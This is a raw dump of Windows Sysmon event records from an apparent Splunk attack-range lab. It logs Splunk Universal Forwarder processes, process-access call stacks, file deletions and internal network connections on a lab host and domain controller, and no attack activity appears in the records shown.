Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214688Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-0EF1-6216-0A04-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:46.763{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84F3C4246229CF9DE1525BFC14CA6336,SHA256=36C71907DEDEF45053B9D6974B4A46674F28DD68A94A7C398B8891AE9E4BB9E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214720Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:46.772{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B14AFAC961339BC702641399BBB4FF8F,SHA256=CF83844A1E99F83F318D5A03AE0EA8DC54D34CC6D8A1B2134303CFE6A08DFA85,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:46.575{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F2AC-6215-B700-000000003802}4292C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214719Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:44.680{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51209-false10.0.1.12-8000- 23542300x8000000000000000214718Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:46.162{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A27FD491B3467D94A9F6D898F12AA93C,SHA256=76233BCB193FD23BEAFD42E0E450732CA04551505E306E25657CF53EE9FEE6AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214717Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:46.162{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D92C9152F3B6C02EB2C5560D76EAEE8,SHA256=11F4D99326B333B3E4A250C1EBA59D7B7B405E6C2E09D2AF597ACEF0F46E7C5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214716Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:46.084{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C04E6FA7C2184F8F4D08A02C3E021EA,SHA256=E1C1F04410953B3BDC54B77E41D1A95822EBEA8D1FCC3BD21387F12E4D2797BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:47.778{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BF5ABED96E80AFC6A71BA0FBEAE68F4,SHA256=36013C4432CE7EF9E7C44D3DE863F25E3E7AD0361C6478AF8D7424CF5FD8D87F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214748Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EF3-6216-0D04-000000003902}3216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214747Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214746Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214745Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214744Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214743Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214742Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214741Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214740Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214739Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214738Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0EF3-6216-0D04-000000003902}3216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214737Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.943{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EF3-6216-0D04-000000003902}3216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214736Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.944{4F8D34B0-0EF3-6216-0D04-000000003902}3216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214735Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.787{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9F309A5F65F62647F33C917089B87D3,SHA256=DF15141AAECCCA9F08B287E9D640FCC36394334AD44307B51DE396CE1E5B21A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:45.566{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53272-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000214734Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.443{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EF3-6216-0C04-000000003902}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214733Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.443{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214732Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.443{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214731Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.443{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214730Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.443{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214729Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:47.443{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214728Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 